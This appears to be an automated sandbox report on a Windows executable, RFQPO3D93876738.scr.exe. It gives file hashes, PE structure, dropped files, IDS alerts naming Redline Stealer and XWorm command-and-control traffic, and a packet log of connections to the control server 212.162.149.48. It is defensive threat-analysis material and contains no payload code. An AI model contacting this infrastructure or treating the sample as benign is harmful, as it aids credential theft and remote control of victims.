Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulJnp/p:NllU
MD5:	BC6DB77EB243BF62DC31267706650173
SHA1:	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256:	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512:	91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................X..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13w5zsur.1xi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4nqchips.teg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d03rotq0.ztr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppdfzt4y.u2z.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.417246960174548
Encrypted:	false
SSDEEP:	6144:zcifpi6ceLPL9skLmb0mCSWSPtaJG8nAgex285i2MMhA20X4WABlGuNv5+:oi58CSWIZBk2MM6AFBVo
MD5:	B55470B0B4C2A1E52AEBB9562D618A97
SHA1:	83E480979029BAD0593BD0F4841B56434FBC30F5
SHA-256:	E00BA3A5465889D30B766B7DC5DEC7E0BD626A6F6CCB66C6C9135E9E156137DE
SHA-512:	907D6192A5176C9748BA92749465B239DC8CF2686A316D0DC5FA9392148782FB61D4851289C2C6038D8DEDF52B09A2D5D61671C1F6D963AA4D4FF622FCF06E80
Malicious:	false
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmV..O................................................................................................................................................................................................................................................................................................................................................./........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.470577743738742
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	RFQPO3D93876738.scr.exe
File size:	1'150'463 bytes
MD5:	f36b1d0ac09e4c4b382fb055192ad8dc
SHA1:	fe0b1fb79204765643e33848a8b164e0cfe190ae
SHA256:	698d95343ffa1d8e7fed498cde18c02aa8ea18082b064b0c70ac7b8b04f4ccb2
SHA512:	b926074342ede645346e446c45c68d98710418a6d0660f7a9433d961d10a9c380d7452dd8ab66afee3cd12f287118683ec1d4bf81943ff75b6394b58f9ca6c42
SSDEEP:	6144:yhv2xU11hxuSinzhRz6S4MnMB2vEiFHgYxLMuLALv2OgC3xpyXnWqSy99JWsxkyC:ymIxzERjbnM8ziW+v28A99S5
TLSH:	2D350184F2AF5D07FD995631D0E571F66AFCAE0372FA8A1FCF45AC46240227C2924972
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....D.f.........."...0..Z............... ....@...... ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x669E44DC [Mon Jul 22 11:39:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x9b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x5aa0	0x5c00	60f48c506313a4925a3288f8d216a471	False	0.6185037364130435	data	6.324374237451162	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x9b4	0xa00	c0aee94ec413900fcc371d16b7a08f29	False	0.3140625	data	4.211456587962225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x80b8	0x388	data			0.5033185840707964
RT_VERSION	0x8440	0x388	data	English	United States	0.5022123893805309
RT_MANIFEST	0x87c8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-22T17:52:28.284473+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:27.721310+0200	TCP	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49704	7011	192.168.2.7	212.162.149.48
2024-07-22T17:52:29.649246+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:30.498013+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:29.390373+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:26.497449+0200	TCP	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	2049	49707	212.162.149.48	192.168.2.7
2024-07-22T17:52:29.932988+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:21.068683+0200	TCP	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:28.279308+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:26.623937+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:26.492100+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:30.073337+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:28.444756+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:26.284063+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:27.942907+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:27.579761+0200	TCP	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	49704	7011	192.168.2.7	212.162.149.48
2024-07-22T17:52:28.723819+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:30.653489+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:21.198421+0200	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	2049	49707	212.162.149.48	192.168.2.7
2024-07-22T17:52:27.644096+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:30.366036+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:27.717948+0200	TCP	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	7011	49704	212.162.149.48	192.168.2.7
2024-07-22T17:52:29.519706+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:27.810815+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:29.798534+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:30.208043+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:28.079962+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:26.879159+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:27.034896+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48
2024-07-22T17:52:28.718576+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	49707	2049	192.168.2.7	212.162.149.48

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2024 17:52:14.348907948 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:14.353919983 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:14.355299950 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:14.509651899 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:14.515217066 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.680866957 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.680895090 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.680922985 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.680936098 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.681087971 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.681087971 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.681174040 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.681353092 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.681365967 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.681397915 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.681411982 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.681490898 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.681528091 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.681540966 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.681566954 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.682032108 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.682066917 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.683866978 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.683908939 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.700289965 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.700303078 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.700314999 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.700402975 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.700905085 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.700917959 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.700930119 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.700942039 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.700948000 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.700992107 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.701796055 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.701844931 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.702730894 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.702744961 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.702815056 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.703264952 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.703278065 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.703319073 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.704638004 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.704651117 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.704663038 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.704674006 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.704685926 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:18.704701900 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:18.704730034 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.006552935 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.008774042 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.008833885 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.008856058 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.009116888 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.009129047 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.009140015 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.009151936 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.009159088 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.009191036 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.010126114 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.010169029 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.010262966 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.010274887 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.010313034 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.010718107 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.011606932 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.011619091 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.011630058 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.011641026 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.011650085 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.011666059 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.013469934 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.013482094 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.013520956 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.027623892 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.030610085 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.030723095 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.030992031 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.031622887 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.031688929 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.031699896 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.031722069 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.031785965 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.031797886 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.031809092 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.031821012 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.031836987 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.031836987 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.031858921 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.032027960 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.032040119 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.032052040 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.032330036 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.034332037 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.034367085 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.034537077 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.035161018 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.035171986 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.035183907 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.035203934 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.035254955 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.038275957 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038328886 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038444042 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.038458109 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038496971 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038510084 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038530111 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.038573980 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038619041 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.038723946 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038736105 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038748026 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038774967 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.038806915 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038819075 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038830042 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038840055 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038851976 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.038863897 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.038863897 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.038902998 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.326376915 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.326404095 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.326416016 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.326462984 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.326843977 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.326857090 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.326868057 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.326879978 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.326901913 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.326946020 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.327358007 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.327435017 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.328680992 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.330859900 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.330872059 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.330889940 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.330899954 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.330910921 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.330921888 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.330931902 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.330931902 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.331013918 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.331552029 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.331563950 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.331705093 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.332092047 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.332237005 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.332247972 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.332283974 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.332284927 CEST	49704	7011	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:19.332478046 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.332567930 CEST	7011	49704	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:19.332578897 CEST	7011	49704	212.162.149.48	192.168.2.7
